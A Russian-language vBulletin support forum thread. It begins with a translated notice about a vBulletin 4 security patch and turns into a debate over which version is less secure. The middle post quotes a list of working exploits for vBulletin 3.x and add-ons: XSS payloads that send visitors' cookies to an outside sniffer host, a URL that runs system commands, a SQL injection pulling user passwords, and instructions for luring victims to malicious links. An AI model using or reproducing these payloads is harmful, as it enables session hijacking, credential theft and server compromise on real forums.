VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
A recent vBulletin 4 (all versions, Suite & Classic) report indicated that if an installation had been hacked previously, the attacker could hide malicious code to allow a repeated attack. To further strengthen vBulletin’s security - additional security checking and query cleaning were added to thwart such attacks.
The issue does not affect vBulletin 3.x.
To improve the security of your vBulletin 4 installation please download the patch from the members area of vBulletin: http://members.vbulletin.com/
We recommend you install this security patch as soon as possible.
The upgrade process is the same as previous patch level releases - simply download the patch from the Members' Area, extract the files and upload to your webserver, overwriting the existing files. There is no upgrade script required.
Additional Information:
This is an update to the previously fixed "social group search exploit"; this new report indicated that in some cases the attacker was able to leave a backdoor in the database to allow subsequent attacks even after a successful patch-fix. This updated patch will prevent such repeated attacks.
To be precise, this is the file that has been patched: packages/vbforum/search/type/socialgroupmessage.php
примерный перевод такой:
В недавней VBulletin 4 (все версии, Suite & Classic) указано, что в некоторых случаях злоумышленник смог оставить черный ход в базы данных для обеспечения последующих атак, даже после успешного патч-исправление. Это обновленный патч позволит предотвратить такие повторные атаки. Проблема не затрагивает VBulletin 3.x. Для повышения безопасности Вашего VBulletin 4 установки, пожалуйста, скачайте патч с площадки автора: HTTP : / / members.vbulletin.com / Мы рекомендуем установить это обновление как можно скорее. Процесс обновления такая же, как предыдущие релизы уровень патч - просто скачать патч с Площадки, извлечь файлы и загрузить на свой Веб-сервер с перезаписью существующих файлов. Существует не сценарий обновления требуется.
файл, который был исправлен: пакеты /vbforum/search/type/socialgroupmessage.php
armagedon_kr добавил 01.11.2011 в 04:28
простите за корявый перевод
Last edited by armagedon_kr : 11-01-2011 at 06:28 AM.
Reason: Добавлено сообщение
kerk, НЕ поясничай)) Когда тройка развивалась там дыр было поболее))
kerk
k0t
Join Date: May 2005
Location: localhost
Posts: 28,820
Версия vB: 3.8.x
Пол:
Reputation:
Гуру 20317
Репутация в разделе: 7745
0
Quote:
Originally Posted by artscripts
дыр было поболее
дыр практически небыло, не надо "ля-ля"
я говорю "практически", потому что недочеты все таки были
но таких косяков, как в 4, разработчики никогда не допускали
здесь же картинка совсем наоборот, форум очень быстро и уверенно превращается в решето
и скоро брэнд "vBulletin", будет в сети ассоциироваться со словами "никогда не ставь это гуано", "дырявый двиг" и подобными...
@armagedon_kr
Продвинутый
Join Date: Dec 2007
Location: Красноярск
Posts: 49
Версия vB: 3.8.x
Пол:
Reputation:
Опытный 15
Репутация в разделе: 7
0
и хоть бы кто поблагодарил за новость, файлик не смог прикрепить, нет прав:((( хотя всегда помогал, когда время было.
armagedon_kr, какие тут благодарности, дай с керком поспорить))
artscripts добавил 01.11.2011 в 13:40 kerk,
Quote:
vBulletin 3.0
3.0.0 - XSS
Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
www.xz.сom/forumpath//search.php?do=process&showposts=0&query=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
3.0-3.0.4 - Выполнение произвольных команд
Описание уязвимости: уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.
Пример:
Код: www.xz.сom/forumpath/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
3.0.3–3.0.9 XSS
Описание уязвимости: уязвимость существует при обработке входных данных в поле Статус. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: менять свой статус по умолчанию может только администрация, начиная от группы Модераторы.
Пример:
Код:
<body onLoad=img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>
3.0.9 and 3.5.4 - XSS
Описание уязвимости: звимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код: http://www.xz.сom/forumpath/newthrea...me='%2Bimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%E2%F3%FE+%F2% E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&stickunstick=1&iconid=0
vBulletin 3.5
3.5.2 - XSS
Описание уязвимости: Уязвимость существует при обработке входных данных в поле "title" в сценарии "calendar.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
BODY:---------->No matter
OTHER OPTIONS:->No matter
Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.
3.5.3 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в поле "Email Address" в модуле "Edit Email & Password". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Примечание: удачная эксплуатация уязвимости возможна при включенных опциях "Enable Email features" и "Allow Users to Email Other Member".
Пример:
Код: www.xz.сom/forumpath/profile.php?do=editpassword
pass:your pass
email: vashe@milo.com”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt
Note About lenght limitation
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}
Пояснение: заходим в профиль и в поле email прописываем vashe@milo.com”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt. Cохраняем. Потом ставим в опциях свой емайл видимым для всех. Теперь втравливаем кому нибудь ссылку www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}, где {your id} ваш id. Cookie уйдут на снифер.
3.5.4 - Дамп БД
Описание уязвимости: уязвимость существует из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'. Удаленный пользователь может с помощью специально сформированного URL сделать дамп базы данных приложения.
Пример:
Код: http://www.xz.com/forumpath/install/...?step=SomeWord
3.5.4 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код:
www.xz.сom/forumpath/inlinemod.php?do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a
Уязвимости в модулях vBulletin.
vBug Tracker 3.5.1 - XSS
Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "sortorder" сценария vbugs.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
Код: http://www.xz.сom/forumpath/vbugs.ph...3Cscript%3Eimg = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%3C/script%3E
ibProArcade 2.x - SQL injection
Описание уязвимости: Уязвимость существует в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
Пример:
Код: http://www.xz.сom/forumpath/index.ph...report&user=-1 union select password from user where userid=[any_user]
Last edited by artscripts : 11-01-2011 at 03:40 PM.
Reason: Добавлено сообщение
Centurion
Эксперт
Join Date: Feb 2011
Location: Мир
Награды в конкурсах:
Posts: 1,315
Версия vB: 3.8.x
Reputation:
Expert 1183
Репутация в разделе: 213
0
artscripts, ну ты нашел что сравнить - "начало движка" и "эволюцию" в лице новой версии, которая должна изначально быть куда лучше и защищенней, чем предыдущие.
kerk
k0t
Join Date: May 2005
Location: localhost
Posts: 28,820
Версия vB: 3.8.x
Пол:
Reputation:
Гуру 20317
Репутация в разделе: 7745
0
в сравнение нужно приводить именно ДЫРЫ движка, основных файлов форума
почти все перечисленные "уязвимости" - это XSS, т.е. не дыры как таковые, воспользоваться этими "дырками" может далеко не каждый ibProArcade 2.x - SQL injection vBug Tracker 3.5.1 - XSS
это вообще к движку не имеет никакого отношения
не будем перечислять все дырявые хаки, их слишком много
дальше... импекс
рекомендуется удалять после конвертации, если админ этого не сделал, то кто ему доктор? папка инстал
тоже самое, везде где только можно, твердим одно и то же, удаляйте папку после установки, но никто ж не читает, как и призывы не ставить УГ 4
==
Quote:
Originally Posted by artscripts
Где твои "ля-ля"
они в соотношении количества дыр в четверке и тройке на определенный промежуток времени
четверка ДОЛЖНА быть гораздо более защищенной на основе многолетнего опыта разработки третьей линейки
когда оставили развитие 2-й линейки и начали писать 3-ку, разрабы учитывали свои ошибки
здесь же мы видим решето